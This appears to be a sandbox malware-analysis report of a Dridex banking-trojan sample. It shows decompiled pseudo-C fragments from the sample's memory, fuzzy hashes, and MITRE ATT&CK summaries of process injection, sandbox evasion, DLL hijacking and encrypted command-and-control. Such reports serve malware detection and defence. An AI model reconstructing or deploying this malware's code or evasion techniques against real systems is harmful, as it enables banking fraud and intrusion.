											E6EA0317C(_t535[0x58], _t228, __eflags,  &(_t535[0x18]));
										}
										goto L42;
									}
									E6E9FF828( &(_t535[0x48]), _t535[0x70]);
									E6EA0317C(_t535[0x58],  &(_t535[0x44]), _t563,  &(_t535[0x18]));
									E6E9FF840( &(_t535[0x44]), _t563);
									E6E9FF840( &(_t535[0x1c]), _t563);
									_t381 = _t381 - 1;
									_t334 = _t535[0x64] + 1;
									_t535[0x60] = _t535[0x60] + 0x14;
									_t535[0x18] = 0;
									_t535[0x64] = _t334;
									if(_t334 == _t535[0x30]) {
										break;
									}
									goto L42;
								}
								E6EA0913C( &(_t535[0x134]), _t519);
								_t535[0x5c] = _t532;
								while(1) {
									_t336 = _t535[0x5c];
									_t562 =  *_t336 - 0xb8;
									if( *_t336 == 0xb8) {
										break;
									}
									_t490 = _t535[0x5c] + E6EA09104( &(_t535[0x138]), __eflags, _t535[0x74]);
									_t535[0x5c] = _t490;
									__eflags = _t490 -  *_t508;
									if(__eflags < 0) {
										continue;
									}
									L37:
									E6E9FF654( &(_t535[0x144]));
									E6E9FF654( &(_t535[0x134]));
									goto L38;
								}
								 *0x6ea0d2ec =  *((intOrPtr*)(_t336 + 1));
								goto L37;
								L42:
								_t381 = _t381 + 1;
							} while (_t381 < 0x1e);
							E6E9FF654( &(_t535[0x11c]));
							E6EA08E68(_t381,  &(_t535[0xd8]));
							E6E9FF654( &(_t535[0x1c]));
							E6E9FF654( &(_t535[0x44]));
							E6E9FF654( &(_t535[0x34]));
							goto L44;
						}
						_t533 = 0;
						_t382 = 0;
						do {
							_t341 = E6E9FF4BC( &(_t535[0xc]), _t382);
							_t517 = _t341;
							E6E9FF828( &(_t535[0x38]), E6E9FF4CC( &(_t535[0x34])) + 0x14);
							_t347 = E6E9FF4BC( &(_t535[0x38]), E6E9FF4CC( &(_t535[0x34])) + 0xffffffec);
							_t451 = 5;
							memcpy(_t347, _t341, _t451 << 2);
							_t535 =  &(_t535[0xc]);
							_t533 = _t533 + 1;
							_t382 = _t382 + 0x14;
							_t535[0x30] = _t535[0x30] + 1;
						} while (_t533 < _t535[0x44]);
						goto L24;
					}
					_t535[0x4c] = 1;
					_t534 = 0x14;
					do {
						_t62 = _t534 - 0x14; // 0x0
						_t383 = E6E9FF4BC( &(_t535[0xc]), _t62);
						_t455 = E6E9FF4BC( &(_t535[0xc]), _t534);
						_t517 =  *_t383;
						_t352 =  *_t455;
						if(_t352 >= _t517 && _t352 <= _t383[1] + _t517) {
							_t383[1] =  *((intOrPtr*)(_t455 + 0x10)) - _t517;
						}
						_t534 = _t534 + 0x14;
						_t354 = _t535[0x4c] + 1;
						_t535[0x4c] = _t354;
					} while (_t354 < _t535[0x44]);
					_t535[0x44] = _t535[4];
					goto L21;
				}
			}

0x6ea01448
0x6ea0144f
0x6ea01452
0x6ea01459
0x6ea01bdb
0x6ea01bdb
0x6ea0145f
0x6ea0146a
0x6ea019a9
0x6ea019ad
0x00000000
0x6ea01c2c
0x6ea019b3
0x6ea019b6
0x6ea019b9
0x6ea019c3
0x6ea019d2
0x6ea019d4
0x6ea019db
0x6ea01bc5
0x6ea01bc7
0x6ea01bca
0x6ea01bce
0x00000000
0x6ea01bce
0x6ea019ea
0x6ea019f5
0x6ea019fc
0x6ea019ff
0x6ea01a01
0x6ea01a04
0x6ea01a07
0x6ea01a0d
0x6ea01a1b
0x6ea01a2b
0x6ea01a50
0x6ea01a61
0x6ea01a64
0x6ea01a66
0x6ea01aca
0x6ea01acd
0x6ea01acd
0x6ea01acf
0x6ea01ad2
0x6ea01ad6
0x6ea01ad6
0x6ea01ada
0x00000000
0x00000000
0x6ea01ae7
0x6ea01aed
0x6ea01b21
0x6ea01b27
0x6ea01b29
0x6ea01bf8
0x6ea01c00
0x6ea01c03
0x6ea01c05
0x6ea01c1c
0x6ea01c1c
0x6ea01c07
0x6ea01c0b
0x6ea01c10
0x6ea01c10
0x6ea01c1e
0x6ea01c24
0x6ea01b43
0x6ea01b43
0x6ea01b45
0x6ea01b45
0x6ea01b47
0x6ea01b47
0x6ea01b4c
0x00000000
0x00000000
0x6ea01b4e
0x6ea01b4f
0x6ea01b52
0x6ea01b55
0x00000000
0x00000000
0x6ea01b61
0x6ea01b64
0x6ea01b66
0x6ea01b7d
0x6ea01b7d
0x6ea01b68
0x6ea01b6c
0x6ea01b71
0x6ea01b71
0x6ea01b8a
0x6ea01b8d
0x6ea01b96
0x6ea01b99
0x6ea01bbc
0x6ea01bc0
0x00000000
0x6ea01bc0
0x6ea01ba1
0x6ea01ba1
0x6ea01bad
0x6ea01bb0
0x6ea01bb9
0x00000000
0x6ea01bb9
0x6ea01b2f
0x6ea01b3f
0x6ea01b3f
0x6ea01b41
0x00000000
0x00000000
0x6ea01b37
0x6ea01b39
0x6ea01b39
0x00000000
0x6ea01b3f
0x6ea01aef
0x6ea01af7
0x6ea01b17
0x6ea01af9
0x6ea01af9
0x6ea01b01
0x6ea01b0a
0x6ea01b0a
0x6ea01b01
0x00000000
0x6ea01af7
0x6ea01a68
0x6ea01a6f
0x00000000
0x00000000
0x6ea01a7c
0x6ea01a82
0x6ea01a87
0x6ea01a8e
0x6ea01a92
0x6ea01aa7
0x6ea01aa9
0x6ea01aab
0x6ea01ab1
0x6ea01abf
0x6ea01abf
0x6ea01ac5
0x00000000
0x6ea01ac5
0x00000000
0x00000000
0x00000000
0x00000000
0x6ea01a0f
0x6ea01a0f
0x6ea01a0f
0x6ea01a10
0x6ea01a13
0x6ea01a17
0x00000000
0x6ea01a2d
0x6ea01a30
0x6ea01a33
0x6ea01a3c
0x6ea01a3f
0x6ea01a40
0x6ea01a42
0x00000000
0x6ea0147d
0x6ea0147f
0x6ea01484
0x6ea0148f
0x6ea0149d
0x6ea014b0
0x6ea014bd
0x6ea014c6
0x6ea014ca
0x6ea014ce
0x6ea01516
0x6ea01516
0x6ea01518
0x6ea0151f
0x00000000
0x00000000
0x6ea01538
0x6ea01540
0x6ea01544
0x6ea01559
0x6ea0155d
0x6ea01561
0x6ea0156a
0x6ea01570
0x6ea01573
0x6ea01577
0x6ea0157f
0x6ea01581
0x6ea01585
0x6ea0158c
0x6ea01595
0x6ea01595
0x6ea01599
0x6ea015ae
0x6ea015c4
0x6ea015d1
0x6ea015d2
0x6ea015d2
0x6ea015d4
0x00000000
0x00000000
0x00000000
0x00000000
0x6ea0158e
0x6ea0158e
0x6ea0158e
0x6ea0158f
0x6ea01590
0x00000000
0x6ea0158e
0x6ea01553
0x6ea01557
0x00000000
0x00000000
0x00000000
0x6ea015d8
0x6ea015d8
0x6ea015d9
0x6ea015dc
0x6ea015e6
0x6ea015e6
0x6ea015ea
0x6ea015f1
0x6ea0164c
0x6ea01651
0x6ea016a4
0x6ea016a4
0x6ea016a8
0x6ea016ac
0x6ea014d6
0x6ea014d9
0x6ea014de
0x6ea014e4
0x6ea014e7
0x6ea014ee
0x6ea014f2
0x6ea014f9
0x6ea01502
0x6ea01506
0x6ea0150a
0x6ea01510
0x00000000
0x00000000
0x00000000
0x6ea01510
0x6ea016b6
0x6ea016c2
0x6ea016cd
0x6ea016d4
0x6ea016dd
0x6ea016e7
0x6ea016e8
0x6ea016f6
0x6ea016fb
0x6ea016fc
0x6ea01709
0x6ea0170e
0x6ea01720
0x6ea01725
0x6ea0172a
0x6ea0173c
0x6ea0174e
0x6ea01753
0x6ea0175e
0x6ea01765
0x6ea0176a
0x6ea01772
0x6ea0177b
0x6ea0177b
0x6ea01787
0x6ea0178e
0x6ea0179a
0x6ea017a6
0x6ea017b4
0x6ea017c5
0x6ea017cc
0x6ea017d1
0x6ea017da
0x6ea017df
0x6ea017e1
0x6ea017e5
0x6ea017e9
0x6ea017f6
0x6ea01803
0x6ea01807
0x6ea0181b
0x6ea0181f
0x00000000
0x00000000
0x6ea01834
0x6ea01836
0x6ea0183e
0x6ea0183b
0x6ea0183b
0x6ea0183b
0x6ea01842
0x6ea01844
0x6ea0184a
0x6ea01850
0x6ea018ac
0x6ea018b5
0x6ea018b9
0x6ea018c6
0x6ea018cf
0x6ea018d4
0x6ea018d8
0x6ea018db
0x6ea0193c
0x6ea01952
0x6ea0195d
0x6ea0195e
0x6ea0195f
0x6ea01963
0x6ea01966
0x6ea01be6
0x6ea01be9
0x6ea01be9
0x00000000
0x6ea01966
0x6ea018e5
0x6ea018f5
0x6ea018fe
0x6ea01907
0x6ea01910
0x6ea01911
0x6ea01912
0x6ea01917
0x6ea0191f
0x6ea01927
0x00000000
0x00000000
0x00000000
0x6ea01929
0x6ea01859
0x6ea0185e
0x6ea01862
0x6ea01862
0x6ea01866
0x6ea01869
0x00000000
0x00000000
0x6ea0188a
0x6ea0188c
0x6ea01890
0x6ea01892
0x00000000
0x00000000
0x6ea01894
0x6ea0189b
0x6ea018a7
0x00000000
0x6ea018a7
0x6ea0186e
0x00000000
0x6ea0196c
0x6ea0196c
0x6ea0196d
0x6ea0197d
0x6ea01989
0x6ea01992
0x6ea0199b
0x6ea019a4
0x00000000
0x6ea019a4
0x6ea01653
0x6ea01655
0x6ea01657
0x6ea0165c
0x6ea01661
0x6ea01674
0x6ea0168a
0x6ea01693
0x6ea01694
0x6ea01694
0x6ea01696
0x6ea01697
0x6ea0169a
0x6ea0169e
0x00000000
0x6ea01657
0x6ea015f3
0x6ea015fd
0x6ea015fe
0x6ea015fe
0x6ea0160b
0x6ea01617
0x6ea01619
0x6ea0161b
0x6ea0161f
0x6ea0162f
0x6ea0162f
0x6ea01636
0x6ea01639
0x6ea0163a
0x6ea0163e
0x6ea01648
0x00000000
0x6ea01648

Memory Dump Source

Source File: 00000001.00000002.810044742.000000006E9F1000.00000020.00020000.sdmp, Offset: 6E9F0000, based on PE: true

Associated: 00000001.00000002.810018026.000000006E9F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810134405.000000006EA0A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810166840.000000006EA0D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810188101.000000006EA0F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0f1b7e77c91480e6d9e4af64358066d334aa791ffd1762f9d6c0f9329b8c23d
Instruction ID: 43e9224cfb9de11ccac1a0aec68a21d730bc885fcd55e0df4a7607f89bb957d3
Opcode Fuzzy Hash: a0f1b7e77c91480e6d9e4af64358066d334aa791ffd1762f9d6c0f9329b8c23d
Instruction Fuzzy Hash: 14326970108345CFD710DFA4D890AEAB7E4AFA530CF148D2DE5958B261EB70E98ACF56

Uniqueness

Uniqueness Score: -1.00%

Function 6E9F6D0C, Relevance: .0, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E9F6D0C() {

				 *0x6ea0d280 = GetUserNameW;
				 *0x6EA0D284 = MessageBoxW;
				 *0x6EA0D288 = GetLastError;
				 *0x6EA0D28C = CreateFileA;
				 *0x6EA0D290 = DebugBreak;
				 *0x6EA0D294 = FlushFileBuffers;
				 *0x6EA0D298 = FreeEnvironmentStringsA;
				 *0x6EA0D29C = GetConsoleOutputCP;
				 *0x6EA0D2A0 = GetEnvironmentStrings;
				 *0x6EA0D2A4 = GetLocaleInfoA;
				 *0x6EA0D2A8 = GetStartupInfoA;
				 *0x6EA0D2AC = GetStringTypeA;
				 *0x6EA0D2B0 = HeapValidate;
				 *0x6EA0D2B4 = IsBadReadPtr;
				 *0x6EA0D2B8 = LCMapStringA;
				 *0x6EA0D2BC = LoadLibraryA;
				 *0x6EA0D2C0 = OutputDebugStringA;
				return 0x6ea0d280;
			}

0x6e9f6d1d
0x6e9f6d25
0x6e9f6d28
0x6e9f6d37
0x6e9f6d3a
0x6e9f6d49
0x6e9f6d4c
0x6e9f6d5b
0x6e9f6d5e
0x6e9f6d6d
0x6e9f6d70
0x6e9f6d7f
0x6e9f6d82
0x6e9f6d91
0x6e9f6d94
0x6e9f6da3
0x6e9f6da6
0x6e9f6da9

Memory Dump Source

Source File: 00000001.00000002.810044742.000000006E9F1000.00000020.00020000.sdmp, Offset: 6E9F0000, based on PE: true

Associated: 00000001.00000002.810018026.000000006E9F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810134405.000000006EA0A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810166840.000000006EA0D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810188101.000000006EA0F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac135d10f6f59f707989532b02d1de0754d88e3c3a37a49f9f40dc1ccda663f6
Instruction ID: 64f6d2d8f361693b4128e9075f992071acdc93ab91cfa6d5ba05cdca2a610555
Opcode Fuzzy Hash: ac135d10f6f59f707989532b02d1de0754d88e3c3a37a49f9f40dc1ccda663f6
Instruction Fuzzy Hash: 6D11DFB8A15B08CF8B48CF09D1909517BF2BB8E318312C2AED809AF365D7349A47CF54

Uniqueness

Uniqueness Score: -1.00%

Function 6E9FBB44, Relevance: .0, Instructions: 16
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E6E9FBB44(intOrPtr* __ecx) {
				void* _t1;
				void* _t2;
				intOrPtr* _t4;

				_t4 = __ecx;
				_t1 = E6E9FC280(__ecx);
				if(_t1 == 0) {
					_t2 = E6EA03064(0x60a28c5c, 0xe96b154c);
					if(_t2 != 0) {
						_push( *_t4);
						asm("int3");
						asm("int3");
					}
					 *_t4 = 0;
					return _t2;
				}
				return _t1;
			}

0x6e9fbb45
0x6e9fbb47
0x6e9fbb4e
0x6e9fbb5a
0x6e9fbb61
0x6e9fbb63
0x6e9fbb65
0x6e9fbb66
0x6e9fbb66
0x6e9fbb67
0x00000000
0x6e9fbb67
0x6e9fbb6e

Memory Dump Source

Source File: 00000001.00000002.810044742.000000006E9F1000.00000020.00020000.sdmp, Offset: 6E9F0000, based on PE: true

Associated: 00000001.00000002.810018026.000000006E9F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810134405.000000006EA0A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810166840.000000006EA0D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810188101.000000006EA0F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07604e7cfcd7805719c03ee9caa2803b83987aefb0ef9c1b2756fd2519e18e65
Instruction ID: e95971bc24ee871567c6c8e9facea85d38ccbc20a0e8a4a0593be64bcfaf4a35
Opcode Fuzzy Hash: 07604e7cfcd7805719c03ee9caa2803b83987aefb0ef9c1b2756fd2519e18e65
Instruction Fuzzy Hash: 87D02230000202B1EF400EE6B810F40933D4FC0288F200C72A9002749CFFB4C0624A28

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report hMUh2Mkqyi

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Dridex

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Jbx Signature Overview

AV Detection:

Compliance:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Exports

Version Infos

Possible Origin

Network Behavior

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

Behavior

Function 6EA00730, Relevance: 5.2, APIs: 3, Instructions: 650
COMMONCrypto

Function 6EA02234, Relevance: 1.5, APIs: 1, Instructions: 30
nativeCOMMON

Function 6EA02820, Relevance: 1.5, APIs: 1, Instructions: 29
memorynativeCOMMON

Function 6EA03138, Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Function 010011ED, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 230
memoryCOMMON

Function 6EA010A4, Relevance: 3.2, APIs: 2, Instructions: 153
COMMON

Function 6EA057B4, Relevance: 3.1, APIs: 2, Instructions: 74
registryCOMMON

Function 6EA05B3C, Relevance: 1.6, APIs: 1, Instructions: 123
COMMON

Function 01001A6A, Relevance: 1.6, APIs: 1, Instructions: 69
COMMON

Function 6EA05BBD, Relevance: 1.6, APIs: 1, Instructions: 65
fileCOMMON

Function 6EA05BE5, Relevance: 1.6, APIs: 1, Instructions: 65
fileCOMMON

Function 6EA05BD1, Relevance: 1.6, APIs: 1, Instructions: 64
fileCOMMON

Function 6EA05BB3, Relevance: 1.6, APIs: 1, Instructions: 60
fileCOMMON

Function 6EA05C01, Relevance: 1.6, APIs: 1, Instructions: 59
fileCOMMON

Function 6EA05E10, Relevance: 1.5, APIs: 1, Instructions: 49
COMMON

Function 6EA05E84, Relevance: 1.5, APIs: 1, Instructions: 45
fileCOMMON

Function 6EA0564C, Relevance: 1.5, APIs: 1, Instructions: 45
registryCOMMON

Function 6EA01030, Relevance: 1.5, APIs: 1, Instructions: 45
COMMON

Function 6EA03628, Relevance: 1.5, APIs: 1, Instructions: 43
memoryCOMMON

Function 6E9F1494, Relevance: 1.9, Strings: 1, Instructions: 613
COMMONCrypto

Function 6E9FA4E8, Relevance: 1.8, Strings: 1, Instructions: 537
COMMONCrypto

Function 6E9F8428, Relevance: 1.8, Strings: 1, Instructions: 531
COMMONCrypto

Function 6EA09370, Relevance: 1.8, Strings: 1, Instructions: 529
COMMONCrypto

Function 6EA0143C, Relevance: .6, Instructions: 572
COMMONCrypto

Function 6E9F6D0C, Relevance: .0, Instructions: 36
COMMON

Function 6E9FBB44, Relevance: .0, Instructions: 16
COMMON